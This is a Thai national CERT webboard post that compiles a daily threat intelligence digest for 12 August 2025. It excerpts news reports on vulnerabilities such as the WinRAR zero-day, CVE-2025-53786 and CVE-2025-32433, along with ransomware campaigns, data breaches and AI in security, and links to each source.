NCSA Webboard
    • ล่าสุด
    • แท็ก
    • ฮิต
      • ติดต่อสำนักงาน
    • ลงทะเบียน
    • เข้าสู่ระบบ

    Cyber Threat Intelligence 12 August 2025

    Cyber Security News
    1
    1
    407
    โหลดโพสเพิ่มเติม
    • เก่าสุดไปยังใหม่สุด
    • ใหม่สุดไปยังเก่าสุด
    • Most Votes
    ตอบ
    • ตอบโดยตั้งกระทู้ใหม่
    เข้าสู่ระบบเพื่อตอบกลับ
    Topic นี้ถูกลบไปแล้ว เฉพาะผู้ใช้งานที่มีสิทธิ์ในการจัดการ Topic เท่านั้นที่จะมีสิทธิ์ในการเข้าชม
    • NCSA_THAICERTN
      NCSA_THAICERT
      แก้ไขล่าสุดโดย

      Healthcare Sector

      • Breaches Are Up, Budgets Are Too, So Why Isn’t Healthcare Safer?
        "A new report from Resilience outlines a growing cyber crisis in the U.S. healthcare sector, where ransomware attacks, vendor compromise, and human error continue to cause widespread disruption. In 2023, breaches exposed 168 million records, and the first half of 2025 has already seen extortion demands as high as $4 million. The sector remains vulnerable, despite large investments in security tools and insurance. The report highlights a major incident in February 2024, when Change Healthcare’s systems were hit by ransomware. That breach disrupted care across the country and exposed 190 million records. Resilience uses it as a case study of how third-party failures can affect the entire healthcare system."
        https://www.helpnetsecurity.com/2025/08/11/resilience-top-healthcare-cybersecurity-risks/

      Industrial Sector

      • Utilities, Factories At Risk From Encryption Holes In Industrial Protocol
        "Despite the promises of OPC UA, a standardized, open source communication protocol often used in industrial settings as a replacement for VPNs, turns out to have a number of vulnerabilities, issues, and potential for exploits. Last week, Tom Tervoort, principal security specialist for Secura, hosted a session at DEF CON 33 dedicated to OPC UA (short for Open Platform Communications Unified Architecture), which was first introduced in 2006. The protocol includes its own cryptographic authentication and transport security layer, and is interoperable between different vendors."
        https://www.darkreading.com/vulnerabilities-threats/utilities-factories-encryption-holes-industrial-protocol

      Vulnerabilities

      • Over 29,000 Exchange Servers Unpatched Against High-Severity Flaw
        "Over 29,000 Exchange servers exposed online remain unpatched against a high-severity vulnerability that can let attackers move laterally in Microsoft cloud environments, potentially leading to complete domain compromise. The security flaw (tracked as CVE-2025-53786) helps threat actors who gain administrative access to on-premises Exchange servers to escalate privileges within the organization's connected cloud environment by forging or manipulating trusted tokens or API calls, without leaving easily detectable traces and making it hard to detect exploitation. CVE-2025-53786 affects Exchange Server 2016, Exchange Server 2019, and Microsoft Exchange Server Subscription Edition, which replaces the perpetual license model with a subscription-based one, in hybrid configurations."
        https://www.bleepingcomputer.com/news/security/over-29-000-exchange-servers-unpatched-against-high-severity-flaw/
      • New TETRA Radio Encryption Flaws Expose Law Enforcement Communications
        "Cybersecurity researchers have discovered a fresh set of security issues in the Terrestrial Trunked Radio (TETRA) communications protocol, including in its proprietary end-to-end encryption (E2EE) mechanism that exposes the system to replay and brute-force attacks, and even decrypt encrypted traffic. Details of the vulnerabilities – dubbed 2TETRA:2BURST – were presented at the Black Hat USA security conference last week by Midnight Blue researchers Carlo Meijer, Wouter Bokslag, and Jos Wetzels. TETRA is a European mobile radio standard that's widely used by law enforcement, military, transportation, utilities, and critical infrastructure operators. It was developed by the European Telecommunications Standards Institute (ETSI). It encompasses four encryption algorithms: TEA1, TEA2, TEA3, and TEA4."
        https://thehackernews.com/2025/08/new-tetra-radio-encryption-flaws-expose.html

      Malware

      • Update WinRAR Tools Now: RomCom And Others Exploiting Zero-Day Vulnerability
        "ESET researchers have discovered a previously unknown vulnerability in WinRAR, being exploited in the wild by Russia-aligned group RomCom. This is at least the third time that RomCom has been caught exploiting a significant zero-day vulnerability in the wild. Previous examples include the abuse of CVE-2023-36884 via Microsoft Word in June 2023, and the combined vulnerabilities assigned CVE‑2024‑9680 chained with another previously unknown vulnerability in Windows, CVE‑2024‑49039, targeting vulnerable versions of Firefox, Thunderbird, and the Tor Browser, leading to arbitrary code execution in the context of the logged-in user in October 2024."
        https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/
        https://www.bleepingcomputer.com/news/security/details-emerge-on-winrar-zero-day-attacks-that-infected-pcs-with-malware/
        https://thehackernews.com/2025/08/winrar-zero-day-under-active.html
        https://therecord.media/winrar-zero-day-exploited-romcom-paper-werewolf-goffee-hackers
        https://www.infosecurity-magazine.com/news/winrar-zero-day-exploited-romcom/
        https://www.securityweek.com/russian-hackers-exploited-winrar-zero-day-in-attacks-on-europe-canada/
        https://www.helpnetsecurity.com/2025/08/11/winrar-zero-day-cve-2025-8088/
        https://www.theregister.com/2025/08/11/russias_romcom_among_those_exploiting/
      • Netherlands: Citrix Netscaler Flaw CVE-2025-6543 Exploited To Breach Orgs
        "The Netherlands' National Cyber Security Centre (NCSC) is warning that a critical Citrix NetScaler vulnerability tracked as CVE-2025-6543 was exploited to breach "critical organizations" in the country. The critical flaw is a memory overflow bug that allows unintended control flow or a denial of service state on impacted devices. "Memory overflow vulnerability leading to unintended control flow and Denial of Service in NetScaler ADC and NetScaler Gateway when configured as Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA virtual server," explains Citrix's advisory."
        https://www.bleepingcomputer.com/news/security/netherlands-citrix-netscaler-flaw-cve-2025-6543-exploited-to-breach-orgs/
        https://www.bankinfosecurity.com/dutch-investigators-blame-multiple-threat-actors-on-hacks-a-29182
      • The Rise Of Native Phishing: Microsoft 365 Apps Abused In Attacks
        "Attackers don’t need exploits; they need TRUST. Changes in attack methods reflect changes in generations. Gen Z, a generation known for prioritizing ease and efficiency, is now entering the cybersecurity landscape on both sides. Some are protecting data, and others are stealing it. With the rise of AI and no-code platforms in attackers’ phishing toolkits, building trust and deceiving users has never been easier. Threat actors are blending default-trusted tools with free, legitimate services to bypass traditional security defenses and human suspicions."
        https://www.bleepingcomputer.com/news/security/the-rise-of-native-phishing-microsoft-365-apps-abused-in-attacks/
      • MuddyWater’s DarkBit Ransomware Cracked For Free Data Recovery
        "Cybersecurity firm Profero cracked the encryption of the DarkBit ransomware gang's encryptors, allowing them to recover a victim's files for free without paying a ransom. This occurred in 2023 during an incident response handled by Profero experts, who were brought in to investigate a ransomware attack on one of their clients, which had encrypted multiple VMware ESXi servers. The timing of the cyberattack suggests that it was in retaliation for the 2023 drone strikes in Iran that targeted an ammunition factory belonging to the Iranian Defence Ministry."
        https://www.bleepingcomputer.com/news/security/muddywaters-darkbit-ransomware-cracked-for-free-data-recovery/
      • REvil Actor Accuses Russia Of Planning 2021 Kaseya Attack
        "A convicted REvil affiliate accused the Russian government of planning the 2021 supply chain attack against Kaseya. Jon DiMaggio, chief intelligence strategist at Analyst1, and John Fokker, head of threat intelligence at Trellix, discussed the ransomware-as-a-service (RaaS) gang REvil during an Aug. 9 session at DEF CON 33. REvil is an infamous gang with a number of large-scale victims under its belt, including Acer and meat processing giant JBS S.A., but the talk covered REvil's most notorious strike: the July 2021 ransomware attack against Kaseya, which specialized in remote IT management software and services."
        https://www.darkreading.com/cyberattacks-data-breaches/revil-actor-russia-planning-2021-kaseya-attack
      • From ClickFix To Command: A Full PowerShell Attack Chain
        "The FortiMail Workspace Security team recently identified a targeted intrusion campaign impacting multiple Israeli organizations. The adversary leveraged compromised internal email infrastructure to distribute phishing messages across the regional business landscape. These emails initiated a multi-stage, PowerShell-based infection chain that culminated in the delivery of a remote access trojan (RAT), executed entirely through PowerShell."
        https://www.fortinet.com/blog/threat-research/clickfix-to-command-a-full-powershell-attack-chain
      • Keys To The Kingdom: Erlang/OTP SSH Vulnerability Analysis And Exploits Observed In The Wild
        "This article presents our observations of exploit attempts targeting CVE-2025-32433. This vulnerability allows unauthenticated remote code execution (RCE) in the Secure Shell (SSH) daemon (sshd) from certain versions of the Erlang programming language's Open Telecom Platform (OTP). Erlang/OTP sshd is widely used in critical infrastructure and operational technology (OT) networks.With a CVSS score of 10.0, CVE-2025-32433 enables unauthenticated clients to execute commands by sending SSH connection protocol messages (codes >= 80) to open SSH ports, which should only be processed after successful authentication. Vulnerable versions include Erlang/OTP prior to OTP-27.3.3, OTP-26.2.5.11 and OTP-25.3.2.20. A patch is available in Erlang/OTP versions OTP-27.3.3, OTP-26.2.5.11, OTP-25.3.2.20 and later."
        https://unit42.paloaltonetworks.com/erlang-otp-cve-2025-32433/
        https://thehackernews.com/2025/08/researchers-spot-surge-in-erlangotp-ssh.html
      • MedusaLocker Ransomware Group Is Looking For Pentesters
        "MedusaLocker is a ransomware strain that was first observed in late 2019, it encrypts files on infected systems and demands a ransom, usually in cryptocurrency, for their decryption. The group operates as Ransomware-as-a-Service (RaaS), meaning affiliates can rent the ransomware in exchange for a cut of the profits. MedusaLocker ransomware gang announced on its Tor data leak site that it is looking for new pentesters."
        https://securityaffairs.com/181033/hacking/medusalocker-ransomware-group-is-looking-for-pentesters.html
      • Dissecting The CastleBot Malware-As-a-Service Operation
        "IBM X-Force has been investigating a newly emerging malware framework named CastleBot. The malware is believed to be part of a Malware-as-a-Service (MaaS) operation and is specifically designed for flexible malware deployment. CastleBot is currently used by cyber criminals to deliver everything from infostealers to backdoors like NetSupport and WarmCookie, which have been linked to ransomware attacks. What makes CastleBot particularly concerning is how it's being distributed: most often through trojanized software installers downloaded from fake websites, luring unsuspecting users into launching the infection themselves. This technique is part of a growing trend X-Force is observing. It is often enabled through SEO poisoning, which causes malicious pages to rank higher in search engines than legitimate software distributors."
        https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation

      Breaches/Hacks/Leaks

      • Connex Credit Union Data Breach Impacts 172,000 Members
        "Connex, one of Connecticut's largest credit unions, warned tens of thousands of members that unknown attackers had stolen their personal and financial information after breaching its systems in early June. Founded in 1940, this member-owned organization is a non-profit with over $1 billion in assets, providing banking, insurance, and credit card services to more than 70,000 members across eight branches throughout the greater New Haven area, including New Haven, Hartford, Middlesex, and Fairfield counties. In data breach notification letters sent to affected individuals via U.S. Mail and filed with the office of Maine's Attorney General, Connex states that it discovered the incident on June 3, one day after its network was breached."
        https://www.bleepingcomputer.com/news/security/connex-credit-union-discloses-data-breach-impacting-172-000-people/
        https://www.infosecurity-magazine.com/news/connex-credit-union-breach/
        https://www.securityweek.com/connex-credit-union-data-breach-impacts-172000-people/
      • Online Portal Exposed Car And Personal Data, Allowed Anyone To Remotely Unlock Cars
        "A carmaker’s online dealership portal has been found leaking the private information and vehicle data of its customers. This also meant that anyone with access could remotely break into a car. Researcher Eaton Zveare shared his discovery with TechCrunch. Although he said he has chosen not to disclose the vendor’s name, he revealed that it is a well-known automaker with several popular sub-brands and more than 1,000 dealerships across the United States. Zveare says it wasn’t easy to find the flaw, but once he did, it allowed him to modify the code at the portal’s login page so he could bypass the login security checks. This permitted him to create a new national administrator account."
        https://www.malwarebytes.com/blog/news/2025/08/online-portal-exposed-car-and-personal-data-allowed-anyone-to-remotely-unlock-cars
        https://www.securityweek.com/flaws-in-major-automakers-dealership-systems-allowed-car-hacking-personal-data-theft/
        https://hackread.com/carmaker-portal-flaw-hackers-unlock-cars-steal-data/
      • Ransomware Gang Claims Attack On St. Paul City Government
        "A ransomware gang the FBI warned the public about last month is claiming to have carried out a cyberattack that has disrupted large parts of St. Paul’s city government. The Interlock ransomware gang added the Minnesota city to its leak site on Monday, claiming to have stolen 43 gigabytes of data. No payment deadline or ransom demand was listed. City and state officials did not respond to requests for comment. It is unclear what data was stolen in the attack but Mayor Melvin Carter said during a press conference on July 29 that the city is most concerned about data related to government employees. Resident data is held in a cloud-based application and was not impacted by the ransomware attack, city officials have said."
        https://therecord.media/ransomware-gang-behind-minnesota-attack

      General News

      • Estimating The Societal Cost Of DDoS Attacks: A Dual-Lens Model For National Impact Assessment
        "A new discussion paper, “Estimating the Societal Cost of DDoS Attacks: A Dual-Lens Model for National Impact Assessment,” authored by Carlos Alvarez, Director of the Hub for the Americas and the Caribbean, has been released by the Global Forum on Cyber Expertise (GFCE), aiming to spark crucial conversations within the international cybersecurity community. This document represents the GFCE’s commitment to providing thought leadership in the field, as well as its intent to foster dialogue and collaboration among diverse stakeholders to address the evolving nature of cyber threats."
        https://thegfce.org/news/estimating-the-societal-cost-of-ddos-attacks-a-dual-lens-model-for-national-impact-assessment/
        https://thegfce.org/wp-content/uploads/2025/08/Societal-Cost-DDoS-Attacks-Carlos-Alvarez.pdf
      • New Data Reveals July’s Worst Ransomware Groups And Attack Surges
        "From critical infrastructure to classrooms, no sector is being spared. In July 2025, cyber attacks surged across nearly every industry and region, marking a sharp escalation in both scale and sophistication. This blog unpacks the latest global trends in cyber attacks, including:"
        https://blog.checkpoint.com/research/global-cyber-threats-july-snapshot-of-an-accelerating-crisis/
      • Researchers Determine Old Vulnerabilities Pose Real-World Threat To Sensitive Data In Public Clouds
        "Using a seven-year-old vulnerability, researchers said they were able to realistically leak private data from public clouds, suggesting that a “lack of concern” about such supposedly impractical attacks is misguided, according to a presentation delivered Monday. The anonymous researchers presented their findings at a hacker conference, WHY2025, in the Netherlands, and they leaned on the kind of “transient execution” vulnerabilities that attracted attention in 2018 with high-profile Intel chip flaw revelations, one of which was known as Spectre."
        https://cyberscoop.com/cloud-security-l1tf-reloaded-public-cloud-vulnerability-exploit/
        https://openreview.net/forum?id=4tDNvQe2G0
      • From Legacy To SaaS: Why Complexity Is The Enemy Of Enterprise Security
        "In this Help Net Security interview, Robert Buljevic, Technology Consultant at Bridge IT, discusses how the coexistence of legacy systems and SaaS applications is changing the way organizations approach security. He explains why finding the right balance between old and new technology is essential for maintaining protection."
        https://www.helpnetsecurity.com/2025/08/11/robert-buljevic-bridge-it-legacy-saas-security/
      • Pentesting Is Now Central To CISO Strategy
        "Security leaders are rethinking their approach to cybersecurity as digital supply chains expand and generative AI becomes embedded in critical systems. A recent survey of 225 security leaders conducted by Emerald Research found that 68% are concerned about the risks posed by third-party software and components. While most say they are meeting regulatory requirements, 60% admit attackers are evolving too fast to maintain resilience. The report highlights a growing tension between compliance and actual security. As one section states, “Security leaders are calling for stronger controls, faster remediation, and greater visibility into emerging AI risks.” Many now view cybersecurity as a strategic business issue rather than just a technical one."
        https://www.helpnetsecurity.com/2025/08/11/pentesting-for-cisos/
      • UK Red Teamers “Deeply Skeptical” Of AI
        "Offensive cybersecurity experts have largely failed to integrate AI into their services, expressing significant reservations about its possible benefits, according to a new government study. Back in December 2024, the Department for Science, Innovation and Technology (DSIT) commissioned Prism Infosec to research how red team specialists are integrating emerging technologies into their products and services. It found that cloud adoption has had a far greater impact on the types of these services being offered than AI."
        https://www.infosecurity-magazine.com/news/uk-red-teamers-deeply-skeptical-of/
      • Managing The Trust-Risk Equation In AI: Predicting Hallucinations Before They Strike
        "Hallucinations are a continuing and inevitable problem for LLMs because they are a byproduct of operation rather than a bug in design. But what if we knew when and why they happen? “Hallucinations – the generation of plausible but false, fabricated, or nonsensical content – are not just common, they are mathematically unavoidable in all computable LLMs… hallucinations are not bugs, they are inevitable byproducts of how LLMs are built, and for enterprise applications, that’s a death knell,” wrote Srini Pagidyala(co-founder of Aigo AI) on LinkedIn."
        https://www.securityweek.com/managing-the-trust-risk-equation-in-ai-predicting-hallucinations-before-they-strike/
      • Red Teams Are Safe From Robots For Now, As AI Makes Better Shield Than Spear
        "At the opening of Black Hat, the largest security shindig in the Hacker Summer Camp week ahead of DEF CON and BSides, the opening keynote speaker suggested the current state of AI slightly favors defenders over attackers, but he warned that was not a given for much longer. "I do believe that AI is the key [in security] because that's one of the few fields where defenders are ahead of the attackers," Mikko Hyppönen, outgoing chief research officer for Finnish security firm WithSecure, told the audience."
        https://www.theregister.com/2025/08/11/ai_security_offense_defense/
      • US Scrambles To Recoup $1M+ Nicked By NORKs
        "The US Department of Justice is trying to recoup around $1 million that three IT specialists secretly working for the North Korean government allegedly stole from a New York company. Bong Chee Shen was first in the door, as the unnamed company hired him in December 2022. He then recommended two other devs to join him to work on the company's cryptocurrency wallet scheme. All three were fired in May 2024 for poor work performance and difficulties communicating with coworkers. The trio would also regularly claim that their microphones weren't working while on video calls."
        https://www.theregister.com/2025/08/11/us_tries_to_recover_1m/
      • Your CV Is Not Fit For The 21st Century – Time To Get It Up To Scratch
        "The job market is queasy and since you're reading this, you need to upgrade your CV. It's going to require some work to game the poorly trained AIs now doing so much of the heavy lifting. I know you don't want to, but it's best to think of this as dealing with a buggy lump of undocumented code, because frankly that's what is between you and your next job."
        https://www.theregister.com/2025/08/11/feature_tech_cv_updates/

      อ้างอิง
      Electronic Transactions Development Agency(ETDA) f3cfb785-4337-4beb-b555-b63eac733dca-image.png

      1 การตอบกลับ คำตอบล่าสุด ตอบ คำอ้างอิง 0
      • First post
        Last post